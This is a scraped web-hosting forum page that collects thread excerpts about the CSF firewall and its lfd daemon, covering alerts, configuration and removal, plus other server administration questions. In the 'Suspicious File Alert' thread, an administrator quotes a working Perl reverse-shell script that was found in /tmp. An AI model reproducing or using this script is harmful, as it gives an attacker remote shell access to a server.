Remove Lfd
I just need to CSF on my server, i dont need to lfd and i need to remove lfd from my server.
View Complete Thread with Replies
Sponsored Links:
Related Forum Messages:
Remove Empty Folders And Remove From A Db
ive got a site which auto creates subdomains and installs a script automaticly and inserts details into a mysql db. i have had some issues recent so have loads (talking 100s) of folders that are empty which i need to remove, and to remove the details of said folder from db also. any ideas how i can do this, using plesk control panel so removing the subdomain via plesk cli may be the best way in that respect but the db is external to plesk so that would not be edited
View Replies!
View Related
Lfd Failed
i have recive many mail. 40 or up per day that : lfd failed @ Fri May 1 13:36:14 2009. A restart was attempted automagically. Service Check Method: [check command]
View Replies!
View Related
Receive Email From LFD
I didn't do any updates, but received this email from lfd: it could be because of automatic cpanel update ? if yes how to check the last update Date/information --------------------- Time: Wed Nov 4 01:00:04 2009 +0330 The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated: /usr/sbin/lvchange: FAILED /usr/sbin/lvconvert: FAILED /usr/sbin/lvcreate: FAILED /usr/sbin/lvdisplay: FAILED /usr/sbin/lvextend: FAILED /usr/sbin/lvm: FAILED /usr/sbin/lvmchange: FAILED /usr/sbin/lvmdiskscan: FAILED /usr/sbin/lvmsadc: FAILED /usr/sbin/lvmsar: FAILED /usr/sbin/lvreduce: FAILED /usr/sbin/lvremove: FAILED /usr/sbin/lvrename: FAILED /usr/sbin/lvresize: FAILED /usr/sbin/lvs: FAILED /usr/sbin/lvscan: FAILED /usr/sbin/pvchange: FAILED /usr/sbin/pvck: FAILED /usr/sbin/pvcreate: FAILED /usr/sbin/pvdisplay: FAILED /usr/sbin/pvmove: FAILED /usr/sbin/pvremove: FAILED /usr/sbin/pvresize: FAILED /usr/sbin/pvs: FAILED /usr/sbin/pvscan: FAILED /usr/sbin/vgcfgbackup: FAILED /usr/sbin/vgcfgrestore: FAILED /usr/sbin/vgchange: FAILED /usr/sbin/vgck: FAILED /usr/sbin/vgconvert: FAILED /usr/sbin/vgcreate: FAILED /usr/sbin/vgdisplay: FAILED /usr/sbin/vgexport: FAILED /usr/sbin/vgextend: FAILED /usr/sbin/vgimport: FAILED /usr/sbin/vgmerge: FAILED /usr/sbin/vgmknodes: FAILED /usr/sbin/vgreduce: FAILED /usr/sbin/vgremove: FAILED /usr/sbin/vgrename: FAILED /usr/sbin/vgs: FAILED /usr/sbin/vgscan: FAILED /usr/sbin/vgsplit: FAILED /sbin/ip6tables: FAILED /sbin/ip6tables-restore: FAILED /sbin/ip6tables-save: FAILED /sbin/iptables: FAILED /sbin/iptables-restore: FAILED /sbin/iptables-save: FAILED /sbin/lvm: FAILED /sbin/lvm.static: FAILED /sbin/pvscan: FAILED /sbin/vgchange: FAILED /sbin/vgscan: FAILED
View Replies!
View Related
Csf / Lfd Setup
My environment: cpanel / whm shared and reseller accounts (300+ domains) secure only ports for cpanel/whm/webmail Problem: Seems like too often people get blocked out of firewall for ftp, webmail, pop3 or webmail. I'm not sure what to do without sacrificing good security measures. Below is my configuration for CSF (chirpy's firewall) Code: ############################################################################### # Copyright 2006, Way to the Web Limited # URL: http://www.waytotheweb.com # Email: sales@waytotheweb.com ############################################################################### # Testing flag - enables a CRON job that clears iptables incase of # configuration problems when you start csf. This should be enabled until you # are sure that the firewall works - i.e. incase you get locked out of your # server! Then do remember to set it to 0 and restart csf when you're sure # everything is OK. Stopping csf will remove the line from /etc/crontab TESTING = "0" # The interval for the crontab in minutes. Since this uses the system clock the # CRON job will run at the interval past the hour and not from when you issue # the start command. Therefore an interval of 5 minutes means the firewall # will be cleared in 0-5 minutes from the firewall start TESTING_INTERVAL = "5" # Enabling auto updates creates a cron job called /etc/cron.d/csf_update which # runs once per day to see if there is an update to csf+lfd and upgrades if # available and restarts csf and lfd. Updates do not overwrite configuration # files or email templates. An email will be sent to the root account if an # update is performed AUTO_UPDATES = "0" # Ethernet device setting is taken from the shared IP address in # /etc/wwwacct.conf but can be overridden here (e.g. "eth0") # # If you have multiple ethernet NICs that you want to apply all rules to, then # you can set the following to the interface name immediately followed by a # plus sign. For example, eth+ will apply all rules to eth0, eth1, etc ETH_DEVICE = "" # Unfiltered ethernet devices in a comma separated list (e.g "eth1,eth2") ETH_DEVICE_SKIP = "" # Lists of ports in the following comma separated lists can be added using a # colon (e.g. 30000:35000). # Allow incoming TCP ports TCP_IN = "20,21,22,25,53,80,110,143,443,465,953,993,995,2083,2087,2095,2096,22305" # Allow outgoing TCP ports TCP_OUT = "20,21,22,25,37,43,53,80,110,113,443,587,873,953,2087,2089,2703" # Allow incoming UDP ports UDP_IN = "20,21,53,953" # Allow outgoing UDP ports # To allow outgoing traceroute add 33434:33523 to this list UDP_OUT = "20,21,53,113,123,873,953,6277" # Allow incoming PING ICMP_IN = "1" # Allow outgoing PING ICMP_OUT = "1" # Block outgoing SMTP except for root, exim and mailman (forces scripts/users # to use the exim/sendmail binary instead of sockets access). This replaces the # protection as WHM > Tweak Settings > SMTP Tweaks. This will block hosting # clients from using your server as an SMTP relay SMTP_BLOCK = "0" # If SMTP_BLOCK is enabled but you want to allow local connections to port 25 # on the server (e.g. for web scripts) then enable this option too SMTP_ALLOWLOCAL = "0" # If this is a MONOLITHIC kernel (i.e. it has no LKM support, e.g. a VPS) then # set this to 1. Because of the nature of monolithic kernels, it's not easy to # determine which modules have been built-in, so some functionality may not be # available and this firewall script may not work. # # One example is if the ip_conntrack and ip_conntrack_ftp iptables kernel # modules are not available. If this happens, FTP passive mode (PASV) won't # work. In such circumstances you will have to open a hole in your firewall and # configure the FTP daemon to use that same hole. For example, with pure-ftpd # you could add the port range 30000:35000 to TCP_IN and add the following line # to /etc/pure-ftpd.conf (without the leading #): # PassivePortRange30000 35000 # Then restart pure-ftpd and csf and passive FTP should then work MONOLITHIC_KERNEL = "0" # Enable logging of dropped connections to blocked ports to syslog, usually # /var/log/messages DROP_LOGGING = "1" # Enable logging of dropped connections to blocked IP addresses in csf.deny or # by lfd with temporary connection tracking blocks DROP_IP_LOGGING = "0" # Only log reserved port dropped connections (0:1023). Useful since you're not # usually bothered about ephemeral port drops DROP_ONLYRES = "0" # Commonly blocked ports that you do not want logging as they tend to just fill # up the log file. These ports are specifically blocked (applied to TCP and UDP # protocols) for incoming connections DROP_NOLOG = "67,68,111,113,135:139,445,513,520,1026,1027,1234,1433,1434,1524,3127" # Enable packet filtering for unwanted or illegal packets PACKET_FILTER = "1" # Log packets dropped by the packet filtering option PACKET_FILTER. This will # show packet drops that iptables has deemed INVALID (i.e. there is no # established TCP connection in the state table), or if the TCP flags in the # packet are out of sequence in the protocol exchange. # # If you see packets being dropped that you would rather allow then disable the # PACKET_FILTER option above by setting it to "0" DROP_PF_LOGGING = "0" # Enable verbose output of iptables commands VERBOSE = "1" # If you wish to allow access from dynamic DNS records (for example if your IP # address changes whenever you connect to the internet but you have a dedicated # dynamic DNS record from the likes of dyndns.org) then you can list the FQDN # records in csf.dyndns and then set the following to the number of seconds to # poll for a change in the IP address. If the IP address has changed iptables # will be updated. # # A setting of 600 would check for IP updates every 10 minutes. Set the value # to 0 to disable the feature DYNDNS = "0" # If you wish to allow access from all IP's that have authenticated using POP # before SMTP (i.e. are valid clients) then you can whitelist them using this # option which checks for IP addresses in /etc/relayhosts which last for 30 # minutes in that file after a successful POP authentication # # A setting of 60 would update IP's every 1 minute. Set the value # to 0 to disable the feature RELAYHOSTS = "0" # Enable this option if you want to allow incoming connections from reserved # ports. Normally, only DNS connections have the same SRC and DST port (53) # and any other connections should have a SRC port > 1023. On *nix systems this # rule is generally adhered to and reserved ports are not allocated as SRC # ports. However, other notable OS's appear to ignore this and allocate them at # will. This means it's possible that users may come in on reserved ports, so # enable this option if you want to allow them to, or disable it if you want to # be strict ALLOW_RES_PORTS = "1" # Limit the number of IP's kept in the /etc/csf/csf.deny file. This can be # important as a large number of IP addresses create a large number of iptables # rules (4 times the number of IP's) which can cause problems on some systems # where either the the number of iptables entries has been limited (esp VPS's) # or where resources are limited. This can result in slow network performance, # or, in the case of iptables entry limits, can prevent your server from # booting as not all the required iptables chain settings will be correctly # configured. The value set here is the maximum number of IPs/CIDRs allowed # if the limit is reached, the entries will be rotated so that the oldest # entries (i.e. the ones at the top) will be removed and the latest is added. # The limit is only checked when using csf -d (which is what lfd also uses) # Set to 0 to disable limiting DENY_IP_LIMIT = "100"
View Replies!
View Related
LFD Messages Regarding High Load...
I have a VPS with Future Hosting and recently I have been getting more and more notifications from LFD regarding high CPU load. For example: Time: Sun Jun 14 06:50:48 2009 -0500 1 Min Load Avg: 9.47 5 Min Load Avg: 6.25 15 Min Load Avg: 3.68 Running/Total Processes: 2/105 I am getting at least one of these a day now and I am also getting alerts about services failing, SPAMD in particular but also EXIM (and messages about LFD being unable to determine the exim queue length). External monitors are also warning me about SMTP timeouts during the same time period that I get the "high load" errors. Tech support seems a bit stumped by this one and ALWAYS come back with "load looks fine right now". With the frequency of the warning emails increasing I am getting very concerned about the stability of my VPS. I am not running anything significant on my VPS yet with minimal visitors and load (RAM usage consistently stays below 300MB on a VPS with 1+GB RAM.
View Replies!
View Related
Lfd - Blocked With Too Many Connections - Time_wait
Our customer is been banned and we have receive notify (we use csf) The email received: ---------------------------------------------------- Time: Sun May 18 08:52:53 2008 IP: 81.22.77.88 (**) Connections: 491 Blocked: permanently Connections: tcp 0 0 72.39.255.200:20 81.22.77.88:5201 TIME_WAIT tcp 0 0 72.39.255.200:20 81.22.77.88:5457 TIME_WAIT tcp 0 0 72.39.255.200:20 81.22.77.88:5456 TIME_WAIT tcp 0 0 72.39.255.200:20 81.22.77.88:5200 TIME_WAIT tcp 0 0 72.39.255.200:20 81.22.77.88:5203 TIME_WAIT tcp 0 0 72.39.255.200:20 81.22.77.88:5459 TIME_WAIT ..... ..... ---------------------------------------------------- IP is the same x all 491 connection, but change port Exactly what mean?
View Replies!
View Related
Trying To Install CSF/LFD On VPS
I was trying to install CSF/LFD on to my VPS but I'm having problems. Its coming out with the error: iptables v1.3.5: Unknown arg `-j' Try `iptables -h' or 'iptables --help' for more information. Error: iptables command [/sbin/iptables -A LOGDROPIN -j ] failed, at line 213 Rus over at CheapVPS assures me his servers support CFD/APF fully so its not something on his end and I've thought of everything on my end. Has anyone come across this problem before?
View Replies!
View Related
Lfd: Suspicious File Alert
I got this system email: Time: Sun Mar 23 23:09:01 2008 File: /tmp/back Reason: Script, starts with #! Owner: nobody:nobody Action: No action taken So I looked and the file says this: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $! "); $paddr=sockaddr_in($port, $iaddr) || die("Error: $! "); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
View Replies!
View Related
Daily Dozen LFD Blocks Normal
I recently got a dedi from Hivelocity, and they installed CSF/LFD. On my previous hosts, I didn't have this, just cPHulk. With this dedi, I'm receiving nearly a dozen daily emails from LFD with IPs that have been blocked for multiple failed logins, mostly with username root, but also sales, staff, admin, system, etc., and a few for port scanning. Is this normal? I've already disabled direct root login via SSH, and I'm not really worried about anyone actually managing to gain access, I'm just curious about the high number of attempts. On previous hosts, where I actually had active sites and forums, with links posted on other forums that are indexed and nicely ranked by Google, I rarely received any emails from cPBrute at all.
View Replies!
View Related
Lfd Warning: Hack Attempt Or Legit
Code: Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser ] - Suspicious directory The 'someuser' is a legitimate user on the server, an auto body website setup last October. The content of the directory: Quote: root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh total 3.0K drwx------ 2 someuser someuser 1.0K May 16 17:54 ./ drwx------ 3 someuser someuser 1.0K May 16 17:54 ../ -rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm File content: Code: $CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan"; $CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build"; $CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile"; $CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources"; 1; __END__ Code: root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh total 3.0K drwx------ 2 someuser someuser 1.0K May 16 17:54 ./ drwx------ 3 someuser someuser 1.0K May 16 17:54 ../ -rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
View Replies!
View Related
Lfd Not Sending SSH Login Anymore
I've notice that LFD (from CSF) is not sending SSH Login notification anymore... I've tried "mail root" and "mail <my email>", it's working. I see the login line in /var/log/secure Tried to tail exim_maillog and I did not saw it at all! I've tried to restart CSF and also look at the configuration, SSH is still there... I'm running CentOS 4.x with cPanel Got any clue ? I've got an other server, same configuration and he's still sending the notification.
View Replies!
View Related
Lfd: High 5 Minute Load Average Alert - 6.37
I use CSF on a VPS with 512 RAM and 1024 Busrt and the other day I received the below notification. My hostsaid it was Mailman and since I don't use mailing lists the recommendationwas to disable it. So I did. I'm curious tho as to why this happened in the first place. Time: Wed Mar 19 17:53:33 2008 1 Min Load Avg: 11.41 5 Min Load Avg: 6.37 15 Min Load Avg: 2.70 Running/Total Processes: 12/94 ...............
View Replies!
View Related
Lfd: System Exploit Checking Detected A Possible Compromise
I always recieve this email: from lfd Time: Tue Apr 29 03:40:13 2008 Possible detection of "Random JS Toolkit" Failed to create test directory /etc/csf/1: No space left on device: See [url] for more information I do this to test if my server is infected: mkdir /home/1 it created without any problems and I used tcpdump and I got this: <script type="text/javascript" src='jscripts/ips_ipsclass.js'></script> <script type="text/javascript" src='jscripts/ipb_global.js'></script> <script type="text/javascript" src='cache/lang_cache/en/lang_javascript.js'></script> <script type="text/javascript" src='jscripts/ips_xmlhttprequest.js'></script> <script type="text/javascript" src='jscripts/ipb_global_xmlenhanced.js'></script> is that mean the server is infected? but these scripts are for the IPB forum board so why I still recieve this email?
View Replies!
View Related
Remove Xen Xps
I have setup a xen VPS some time back. I need to remove it permanently. I have used the commands virsh destroy <domainID> as well as xm destroy <domainID>. However they only performs a shutdown. I can restore it back! I want to remove / wipe it permanently and memory consumed is given up then and reflected in the core server.
View Replies!
View Related
Remove History Command
Is there any way so that i can remove a specific command from history. 628 ll 629 cat bash.sh 630 man mail 631 exit 632 history You see my history command displays output as this. I need to remove the 630 th command. Is this possible ? I can use history -r but, it will remove all the commands executed in the session. I need a command to remove a specific thing from history.
View Replies!
View Related
Yum Remove Command
I had some issues with PHP compilation seems to be issue with zlib. So I decided to remove it. What happened then is something like nightmare... The command yum remove zlib removed zlib + all dependencies without asking me what to remove. So it removed majority of packages including yum itself. How can I force yum to not remove dependencies when I uninstall some package?
View Replies!
View Related
Remove CPanel Garbage....
I hate cpanl. It's bloated, slow, and just twice as hard to do anything(over command line). Anyways, how can I turn this crap off...it seems like ever time I reboot something comes back and changes conf files(installs older version of programs) and stuff like that. I've shut off any cpanel stuff I can find in the services startup and removed all crons but is there anything else? I get emails like cpsrvd failed @ Fri Jun 22 10:25:38 2007. A restart was attempted automagicly.
View Replies!
View Related
Is Logwatch Important? Can I Remove It
I'm running out of disk space on /var and it seem /var/cache/logwatch has almost 4GB of space. Can I remove everything inside and uninstall logwatch? How do I remove logwatch from the system and any affect of the system functionality. DirectAdmin CentOS4.4
View Replies!
View Related
How To Use .htaccess To Remove Subdirectory...
Is it possible to use .htaccss to remove the subdirectory from a url? The reason I ask it that the script I want to use requires members to be in a /users/ directory, and I would like to remove that part of the url. For instance... can I use .htaccess to change www.thewebsite.com/users/username to www.thewebsite.com/username I have absolutely no need to access the /users/ directory without the username, it's just that all accounts are created in that directory. Is it possible?
View Replies!
View Related
Flushing Iptables/remove Rules
I have a VPS (Virtuozzo) with cPanel installed. I notice that iptables running in the VPS had many DROP rules when I listed using iptables -nL command. So I flushed iptabled using "iptables -F" command and also "> /etc/sysconfig/iptables" command and restarted iptabled. When I try to list the rules it would show empty. However when I try to list after a few minutes it is showing the same old rules with many DROP rules yet again! Is there anyway to remove the rules completely?
View Replies!
View Related
How Do I Remove My ISP IP From Email And Only Use My Server IP
The way Exim is setup on Cpanel/Centos is that it adds the origination IP and server IP address that the email is relayed through. Because many RBL's flag Verizon and Comcast ISP IP's as spam sources; it causes my email relayed through my server to be rejected. Note: My server IP is not on any RBL for spam or abuse. Is there a way to edit Exim to only use the server IP adddress that I relay through?
View Replies!
View Related
Remove Server MySQL Connection
I bought a VPS to run a part of a application I have and it needs to connect to my database in cpanel. I have set everything up properly and allowed the remote server to connect to my server, I updated the DB connect file with the correct mysql server username and password. But when I try and run the script I get this error. Quote: Client does not support authentication protocol requested by server; consider upgrading MySQL client in I'm not 100% sure what to do. I don't understand why it wouldn't work because it works perfectly on the main server with my scripts. But I get that error message on the remote server.
View Replies!
View Related
Remove Linux And Install Windows XP
I need to remove CentOS from an old office PC. Dont get me wrong I use Linux almost on everything but for specific reason I need to get XP back into this old AMD PC. I cannot install XP. I cannot remove Linux. This install is devil. It will not let me remove it. I tried everything. XP disk goes black screen and stays there, this is happens with some hardware and you have to remove all Linux partitions to me the Windows XP disk install start. The problem I CANT remove it. I go to rescue mode, or interactive, mode, it doesnt matter, I cannot remove linux. "fisk -l" Go to my partition fdisk /dev/sda2 d for delete and it just outputs: No partition is defined yet! I tried lots of ways around it and always that message. Linux doesnt let me remove the partitions. How in the world do I get XP back now?
View Replies!
View Related
Batch Remove Files And Copy
to move the httpdocs folders of multiple sites on my plesk server to another server (share on other serv is already mounted so thats not an issue) but their is 31 different domains i need to copy. wondering if anyone knows any way to batch automate a cp process to copy each domains files to a new folder on remote server (this is for backup purposes not live sites so i cant use plesk migration etc
View Replies!
View Related
Can't Remove The Ip Blocked By APF Antidos
APF Antidos blacklisted a number of ips that seem to be okay to me I have tried to delete them with /etc/apf/apf -l , /etc/apf/apf --unban xxx.xx.., and even iptables --flush no avail ! Where does apf store its ip rules. I guess that is /etc/apf/.ipt.chains but not found .. looks like there was no command line option allowing to remove IPs from apf backlist
View Replies!
View Related
|
TRACKER
